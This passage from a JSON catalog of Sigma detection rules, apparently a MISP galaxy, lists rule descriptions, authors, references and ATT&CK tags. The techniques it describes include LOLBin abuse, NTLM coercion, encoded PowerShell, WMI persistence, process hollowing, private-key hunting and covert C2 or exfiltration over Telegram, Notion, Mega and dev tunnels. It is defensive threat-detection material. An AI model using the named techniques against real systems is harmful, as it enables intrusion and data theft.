"related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", "value": "Potential Arbitrary File Download Via Cmdl32.EXE" }, { "description": "Detects OpenWith.exe being used to launch another binary. OpenWith.exe is a signed Windows binary (LOLBin) that can be abused to proxy execution of an arbitrary program.", "meta": { "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "creation_date": "2019-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_openwith.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/harr0ey/status/991670870384021504", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "value": "OpenWith.exe Executes Specified Binary" }, { "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using cmd.exe.\nThis could be a sign of obfuscation or of a fat-finger problem (a typo by the developer).\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_no_space_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1562072617552678912", "https://ss64.com/nt/cmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml" ], "tags": [ 
"attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", "value": "Cmd.EXE Missing Space Characters Execution Anomaly" }, { "description": "Detects PowerShell script execution via input stream redirect", "meta": { "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "creation_date": "2020-10-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "value": "Run PowerShell Script from Redirected Input Stream" }, { "description": "Detects execution from an Alternate Data Stream (ADS). 
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", "meta": { "author": "frack113", "creation_date": "2021-09-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_alternate_data_streams.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", "value": "Execute From Alternate Data Streams" }, { "description": "Detects the rare use of the command line tool shutdown to logoff a user", "meta": { "author": "frack113", "creation_date": "2022-10-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_shutdown_logoff.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_logoff.yml" ], "tags": [ "attack.impact", "attack.t1529" ] }, "related": [ { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "value": "Suspicious Execution of Shutdown to Log Out" }, { "description": "Detects suspicious parent process 
for cmd.exe", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_unusual_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_unusual_parent.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "value": "Unusual Parent Process For Cmd.EXE" }, { "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", "meta": { "author": "_pete_0, TheDFIRReport", "creation_date": "2022-05-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" ], "tags": [ "attack.execution", "attack.t1059.003", "stp.1u" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "value": "Operator Bloopers Cobalt Strike Commands" }, { "description": "Detects possible NTLM coercion via certutil 
using the 'syncwithWU' flag", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_ntlm_coercion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/issues/243", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", "value": "Potential NTLM Coercion Via Certutil.EXE" }, { "description": "Detects command-line tools being used to search for private key or certificate files on a compromised system. Adversaries may hunt for such files to obtain insecurely stored credentials.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-07-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_private_keys_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_private_keys_recon.yml" ], "tags": [ "attack.credential-access", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "value": "Private Keys Reconnaissance Via CommandLine Tools" }, { "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", "meta": { "author": "Nasreddine 
Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mspub_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mspub_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "value": "Arbitrary File Download Via MSPUB.EXE" }, { "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", "meta": { "author": "frack113", "creation_date": "2021-07-27", "falsepositive": [ "Legitimate activity is expected since compressing files with a password is common." 
], "filename": "proc_creation_win_7zip_password_compression.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_password_compression.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP" }, { "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_winword_dll_load.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_winword_dll_load.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7375e28-5c14-432f-b8d1-1db26c832df3", "value": "Potential Arbitrary DLL Load Using Winword" }, { "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as other files", "meta": { "author": "Florian Roth (Nextron Systems), frack113", "creation_date": "2021-11-29", "falsepositive": [ "Unlikely" 
], "filename": "proc_creation_win_regsvr32_susp_extensions.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_extensions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "value": "Regsvr32 DLL Execution With Suspicious File Extension" }, { "description": "Detects presence of a potentially xor encoded powershell command", "meta": { "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", "creation_date": "2018-09-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_xor_commandline.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mez0.cc/posts/cobaltstrike-powershell-exec/", "https://zero2auto.com/2020/05/19/netwalker-re/", "https://redcanary.com/blog/yellow-cockatoo/", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059.001", "attack.t1140", "attack.t1027" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", "value": "Suspicious XOR Encoded PowerShell Command" }, { "description": "Detects suspicious encoded payloads in WMI Event Consumers", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-09-01", "falsepositive": [ "Unknown" ], "filename": "sysmon_wmi_susp_encoded_scripts.yml", "level": "high", "logsource.category": "wmi_event", "logsource.product": "windows", "refs": [ "https://github.com/RiccardoAncarani/LiquidSnake", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.persistence", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", "value": "Suspicious Encoded Scripts in a WMI Consumer" }, { "description": "Detects creation of WMI event subscription persistence method", "meta": { "author": "Tom Ueltschi (@c_APT_ure)", "creation_date": "2019-01-12", "falsepositive": [ "Exclude legitimate (vetted) use of WMI event subscription in your network" ], "filename": "sysmon_wmi_event_subscription.yml", "level": "medium", "logsource.category": "wmi_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected", 
"https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected", "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" ], "tags": [ "attack.persistence", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", "value": "WMI Event Subscription" }, { "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "creation_date": "2019-04-15", "falsepositive": [ "Legitimate administrative scripts" ], "filename": "sysmon_wmi_susp_scripting.yml", "level": "high", "logsource.category": "wmi_event", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", "https://github.com/RiccardoAncarani/LiquidSnake", "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" ], "tags": [ "attack.execution", "attack.t1059.005" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "value": "Suspicious Scripting in a WMI Consumer" }, { "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", "meta": { "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', 
Sittikorn S", "creation_date": "2022-01-25", "falsepositive": [ "Unknown" ], "filename": "proc_tampering_susp_process_hollowing.yml", "level": "medium", "logsource.category": "process_tampering", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_tampering/proc_tampering_susp_process_hollowing.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055.012" ] }, "related": [ { "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", "value": "Potential Process Hollowing Activity" }, { "description": "Detects a non-browser process interacting with the Telegram API, which could indicate use of a covert C2 channel", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-19", "falsepositive": [ "Legitimate applications communicating with the Telegram API, e.g. web browsers not in the exclusion list, apps with an RSS feature, etc." 
], "filename": "net_connection_win_domain_telegram_api_non_browser_access.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_telegram_api_non_browser_access.yml" ], "tags": [ "attack.command-and-control", "attack.t1102" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3dbbc9f-ef1d-470a-a90a-d343448d5875", "value": "Suspicious Non-Browser Network Communication With Telegram API" }, { "description": "Detects a network connection initiated by \"Regsvr32.exe\"", "meta": { "author": "Dmitriy Lifanov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_regsvr32_network_activity.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" ], "tags": [ "attack.execution", "attack.t1559.001", "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", "value": "Network Connection Initiated By Regsvr32.EXE" }, { 
"description": "Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "Kamran Saifullah", "creation_date": "2023-11-20", "falsepositive": [ "Legitimate use of Visual Studio Code tunnel will also trigger this." ], "filename": "net_connection_win_domain_vscode_tunnel_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://cydefops.com/vscode-data-exfiltration", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_vscode_tunnel_connection.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b657234-038e-4ad5-997c-4be42340bce4", "value": "Network Connection Initiated To Visual Studio Code Tunnels Domain" }, { "description": "Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "Kamran Saifullah", "creation_date": "2023-11-20", "falsepositive": [ "Legitimate use of Devtunnels will also trigger this." 
], "filename": "net_connection_win_domain_devtunnels.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2", "https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security", "https://cydefops.com/devtunnels-unleashed", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_devtunnels.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4", "value": "Network Connection Initiated To DevTunnels Domain" }, { "description": "Detects a network connection initiated by a binary to \"api.mega.co.nz\".\nAttackers were seen abusing file sharing websites similar to \"mega.nz\" in order to upload/download additional payloads.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-06", "falsepositive": [ "Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool." 
], "filename": "net_connection_win_domain_mega_nz.yml", "level": "low", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://megatools.megous.com/", "https://www.mandiant.com/resources/russian-targeting-gov-business", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_mega_nz.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "value": "Network Connection Initiated To Mega.nz" }, { "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-02-16", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_rdp_reverse_tunnel.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1096842275437625346", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" ], "tags": [ "attack.command-and-control", "attack.t1572", "attack.lateral-movement", "attack.t1021.001", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "value": "RDP Over Reverse SSH Tunnel" }, { "description": "Detects a rundll32 that communicates with public IP addresses", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-11-04", 
"falsepositive": [ "Communication to other corporate systems that use IP addresses from public address spaces" ], "filename": "net_connection_win_rundll32_net_connections.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011", "attack.execution" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", "value": "Rundll32 Internet Connection" }, { "description": "Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as \"OffensiveNotion C2\"", "meta": { "author": "Gavin Knapp", "creation_date": "2023-05-03", "falsepositive": [ "Legitimate applications communicating with the \"api.notion.com\" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured." 
], "filename": "net_connection_win_domain_notion_api_susp_communication.yml", "level": "low", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/mttaggart/OffensiveNotion", "https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_notion_api_susp_communication.yml" ], "tags": [ "attack.command-and-control", "attack.t1102" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e9cf7b6-e827-11ed-a05b-15959c120003", "value": "Potentially Suspicious Network Connection To Notion API" }, { "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Other SMTP tools" ], "filename": "net_connection_win_susp_outbound_smtp_connections.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://www.ietf.org/rfc/rfc2821.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"9976fa64-2804-423c-8a5b-646ade840773", "value": "Suspicious Outbound SMTP Connections" }, { "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", "meta": { "author": "elhoim", "creation_date": "2022-04-28", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/intelligence-insights-november-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" ], "tags": [ "attack.t1055", "attack.t1218", "attack.execution", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "value": "Microsoft Sync Center Suspicious Network Connections" }, { "description": "Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)\n", "meta": { "author": "Gavin Knapp", "creation_date": "2023-05-01", "falsepositive": [ "Legitimate applications communicating with the \"googleapis.com\" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning." 
